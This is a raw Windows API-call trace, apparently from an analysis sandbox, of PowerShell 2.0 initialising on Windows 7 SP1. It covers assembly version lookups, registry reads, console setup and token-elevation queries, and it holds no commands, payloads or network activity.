	[0636.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x251b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.349] CoTaskMemFree (pv=0x251b20) 
	[0636.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0636.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0636.361] SetErrorMode (uMode=0x1) returned 0x1
	[0636.361] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x18dae0 | out: lpFileInformation=0x18dae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0636.361] SetErrorMode (uMode=0x1) returned 0x1
	[0636.361] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x18dd50 | out: lpdwHandle=0x18dd50) returned 0x94c
	[0636.363] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cd8fc8 | out: lpData=0x2cd8fc8) returned 1
	[0636.365] VerQueryValueW (in: pBlock=0x2cd8fc8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18dcc8, puLen=0x18dcc0 | out: lplpBuffer=0x18dcc8*=0x2cd9064, puLen=0x18dcc0) returned 1
	[0636.365] VerQueryValueW (in: pBlock=0x2cd8fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x18dc38, puLen=0x18dc30 | out: lplpBuffer=0x18dc38*=0x2cd9140, puLen=0x18dc30) returned 1
	[0636.365] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0636.365] CoTaskMemAlloc (cb=0x2e) returned 0x2a4d60
	[0636.365] lstrcpyW (in: lpString1=0x2a4d60, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0636.365] CoTaskMemFree (pv=0x2a4d60) 
	[0636.365] VerQueryValueW (in: pBlock=0x2cd8fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x18dc38, puLen=0x18dc30 | out: lplpBuffer=0x18dc38*=0x2cd9194, puLen=0x18dc30) returned 1
	[0636.365] lstrlenW (lpString="System.Management.Automation") returned 28
	[0636.365] CoTaskMemAlloc (cb=0x3c) returned 0x2a3510
	[0636.365] lstrcpyW (in: lpString1=0x2a3510, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0636.365] CoTaskMemFree (pv=0x2a3510) 
	[0636.365] VerQueryValueW (in: pBlock=0x2cd8fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x18dc38, puLen=0x18dc30 | out: lplpBuffer=0x18dc38*=0x2cd91f0, puLen=0x18dc30) returned 1
	[0636.365] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0636.365] CoTaskMemAlloc (cb=0x20) returned 0x29fb20
	[0636.365] lstrcpyW (in: lpString1=0x29fb20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0636.365] CoTaskMemFree (pv=0x29fb20) 
	[0636.366] VerQueryValueW (in: pBlock=0x2cd8fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x18dc38, puLen=0x18dc30 | out: lplpBuffer=0x18dc38*=0x2cd9230, puLen=0x18dc30) returned 1
	[0636.366] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0636.366] CoTaskMemAlloc (cb=0x44) returned 0x2a3510
	[0636.366] lstrcpyW (in: lpString1=0x2a3510, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0636.366] CoTaskMemFree (pv=0x2a3510) 
	[0636.366] VerQueryValueW (in: pBlock=0x2cd8fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x18dc38, puLen=0x18dc30 | out: lplpBuffer=0x18dc38*=0x2cd9298, puLen=0x18dc30) returned 1
	[0636.366] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0636.366] CoTaskMemAlloc (cb=0x76) returned 0x243390
	[0636.366] lstrcpyW (in: lpString1=0x243390, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0636.366] CoTaskMemFree (pv=0x243390) 
	[0636.366] VerQueryValueW (in: pBlock=0x2cd8fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x18dc38, puLen=0x18dc30 | out: lplpBuffer=0x18dc38*=0x2cd9334, puLen=0x18dc30) returned 1
	[0636.366] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0636.366] CoTaskMemAlloc (cb=0x44) returned 0x2a3510
	[0636.366] lstrcpyW (in: lpString1=0x2a3510, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0636.366] CoTaskMemFree (pv=0x2a3510) 
	[0636.366] VerQueryValueW (in: pBlock=0x2cd8fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x18dc38, puLen=0x18dc30 | out: lplpBuffer=0x18dc38*=0x2cd9398, puLen=0x18dc30) returned 1
	[0636.366] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0636.366] CoTaskMemAlloc (cb=0x58) returned 0x1f54b0
	[0636.366] lstrcpyW (in: lpString1=0x1f54b0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0636.367] CoTaskMemFree (pv=0x1f54b0) 
	[0636.367] VerQueryValueW (in: pBlock=0x2cd8fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x18dc38, puLen=0x18dc30 | out: lplpBuffer=0x18dc38*=0x2cd9414, puLen=0x18dc30) returned 1
	[0636.367] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0636.367] CoTaskMemAlloc (cb=0x20) returned 0x29fb20
	[0636.367] lstrcpyW (in: lpString1=0x29fb20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0636.367] CoTaskMemFree (pv=0x29fb20) 
	[0636.367] VerQueryValueW (in: pBlock=0x2cd8fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x18dc38, puLen=0x18dc30 | out: lplpBuffer=0x18dc38*=0x2cd90bc, puLen=0x18dc30) returned 1
	[0636.367] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0636.367] CoTaskMemAlloc (cb=0x66) returned 0x261b00
	[0636.367] lstrcpyW (in: lpString1=0x261b00, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0636.367] CoTaskMemFree (pv=0x261b00) 
	[0636.367] VerQueryValueW (in: pBlock=0x2cd8fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x18dc38, puLen=0x18dc30 | out: lplpBuffer=0x18dc38*=0x0, puLen=0x18dc30) returned 0
	[0636.367] VerQueryValueW (in: pBlock=0x2cd8fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x18dc38, puLen=0x18dc30 | out: lplpBuffer=0x18dc38*=0x0, puLen=0x18dc30) returned 0
	[0636.367] VerQueryValueW (in: pBlock=0x2cd8fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x18dc38, puLen=0x18dc30 | out: lplpBuffer=0x18dc38*=0x0, puLen=0x18dc30) returned 0
	[0636.367] VerQueryValueW (in: pBlock=0x2cd8fc8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18dc08, puLen=0x18dc00 | out: lplpBuffer=0x18dc08*=0x2cd9064, puLen=0x18dc00) returned 1
	[0636.367] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0636.367] VerLanguageNameW (in: wLang=0x0, szLang=0x239c20, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0636.367] CoTaskMemFree (pv=0x239c20) 
	[0636.367] VerQueryValueW (in: pBlock=0x2cd8fc8, lpSubBlock="\\", lplpBuffer=0x18dc58, puLen=0x18dc50 | out: lplpBuffer=0x18dc58*=0x2cd8ff0, puLen=0x18dc50) returned 1
	[0636.376] CoTaskMemAlloc (cb=0x104) returned 0x251b20
	[0636.376] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x251b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.376] CoTaskMemFree (pv=0x251b20) 
	[0636.377] CoTaskMemAlloc (cb=0x104) returned 0x251b20
	[0636.378] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x251b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.378] CoTaskMemFree (pv=0x251b20) 
	[0636.385] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18db28 | out: phkResult=0x18db28*=0x30c) returned 0x0
	[0636.386] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x18db18 | out: phkResult=0x18db18*=0x310) returned 0x0
	[0636.386] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18dba8 | out: phkResult=0x18dba8*=0x314) returned 0x0
	[0636.389] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18daec, lpData=0x0, lpcbData=0x18dae8*=0x0 | out: lpType=0x18daec*=0x1, lpData=0x0, lpcbData=0x18dae8*=0x56) returned 0x0
	[0638.193] CoTaskMemAlloc (cb=0x5a) returned 0x261a90
	[0638.193] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18dabc, lpData=0x261a90, lpcbData=0x18dab8*=0x56 | out: lpType=0x18dabc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18dab8*=0x56) returned 0x0
	[0638.193] CoTaskMemFree (pv=0x261a90) 
	[0638.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0638.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0638.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0638.227] CoTaskMemAlloc (cb=0x104) returned 0x22c590
	[0638.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22c590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0638.227] CoTaskMemFree (pv=0x22c590) 
	[0651.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0651.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0654.458] CoTaskMemAlloc (cb=0x104) returned 0x2a1e80
	[0654.458] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1e80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.458] CoTaskMemFree (pv=0x2a1e80) 
	[0654.459] CoTaskMemAlloc (cb=0x104) returned 0x2a1e80
	[0654.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1e80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.459] CoTaskMemFree (pv=0x2a1e80) 
	[0654.465] CoTaskMemAlloc (cb=0x104) returned 0x2a1e80
	[0654.465] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1e80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.465] CoTaskMemFree (pv=0x2a1e80) 
	[0654.467] CoTaskMemAlloc (cb=0x104) returned 0x2a1e80
	[0654.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1e80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.467] CoTaskMemFree (pv=0x2a1e80) 
	[0654.467] CoTaskMemAlloc (cb=0x104) returned 0x2a1e80
	[0654.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1e80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.468] CoTaskMemFree (pv=0x2a1e80) 
	[0659.544] CoTaskMemAlloc (cb=0x104) returned 0x22c590
	[0659.544] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22c590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0659.544] CoTaskMemFree (pv=0x22c590) 
	[0659.547] CoTaskMemAlloc (cb=0x104) returned 0x22c590
	[0659.547] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22c590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0659.547] CoTaskMemFree (pv=0x22c590) 
	[0661.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0666.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x18d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0666.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x18d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0666.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0666.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0671.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x18d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0671.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x18d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0676.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0676.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0676.148] CoTaskMemAlloc (cb=0x104) returned 0x236510
	[0676.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x236510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.148] CoTaskMemFree (pv=0x236510) 
	[0676.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0676.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0676.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0679.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x18d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0679.720] SetErrorMode (uMode=0x1) returned 0x1
	[0679.720] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x18da80 | out: lpFileInformation=0x18da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0679.720] SetErrorMode (uMode=0x1) returned 0x1
	[0691.266] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0691.266] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.266] CoTaskMemFree (pv=0x1b93b8b0) 
	[0691.267] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0691.267] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.268] CoTaskMemFree (pv=0x1b93b8b0) 
	[0691.268] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0691.268] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.268] CoTaskMemFree (pv=0x1b93b8b0) 
	[0691.270] CoCreateGuid (in: pguid=0x18de48 | out: pguid=0x18de48*(Data1=0xdccd009a, Data2=0x2384, Data3=0x4e9a, Data4=([0]=0xb1, [1]=0x10, [2]=0xd, [3]=0xd4, [4]=0x42, [5]=0xf8, [6]=0x9e, [7]=0x6c))) returned 0x0
	[0692.858] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0692.858] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0692.858] CoTaskMemFree (pv=0x1b93b8b0) 
	[0692.861] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0692.861] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0692.861] CoTaskMemFree (pv=0x1b93b8b0) 
	[0692.984] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0692.984] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0692.984] CoTaskMemFree (pv=0x1b93b8b0) 
	[0692.994] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0692.996] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x18daf0 | out: lpConsoleScreenBufferInfo=0x18daf0) returned 1
	[0693.005] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0693.006] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x18daf0 | out: lpConsoleScreenBufferInfo=0x18daf0) returned 1
	[0693.007] GetVersionExW (in: lpVersionInformation=0x18da80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18da80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0693.010] GetCurrentProcess () returned 0xffffffffffffffff
	[0693.010] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18db18 | out: TokenHandle=0x18db18*=0x314) returned 1
	[0693.015] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18da38 | out: TokenInformation=0x0, ReturnLength=0x18da38) returned 0
	[0693.016] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x207310
	[0693.016] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x207310, TokenInformationLength=0x4, ReturnLength=0x18da38 | out: TokenInformation=0x207310, ReturnLength=0x18da38) returned 1
	[0699.008] DuplicateTokenEx (in: hExistingToken=0x314, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x18db98 | out: phNewToken=0x18db98*=0x2f0) returned 1
	[0699.008] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18da38 | out: TokenInformation=0x0, ReturnLength=0x18da38) returned 0
	[0699.008] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x207340
	[0699.008] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x207340, TokenInformationLength=0x4, ReturnLength=0x18da38 | out: TokenInformation=0x207340, ReturnLength=0x18da38) returned 1
